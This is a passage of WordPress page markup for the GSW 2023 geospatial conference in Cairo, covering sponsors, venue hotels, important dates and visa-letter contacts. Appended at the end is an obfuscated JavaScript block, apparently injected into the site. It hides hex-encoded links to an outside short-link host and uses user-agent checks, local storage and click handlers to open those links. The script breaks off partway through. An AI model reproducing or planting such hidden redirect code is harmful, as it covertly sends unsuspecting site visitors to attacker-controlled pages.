!important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687570910477{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>&nbsp;[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 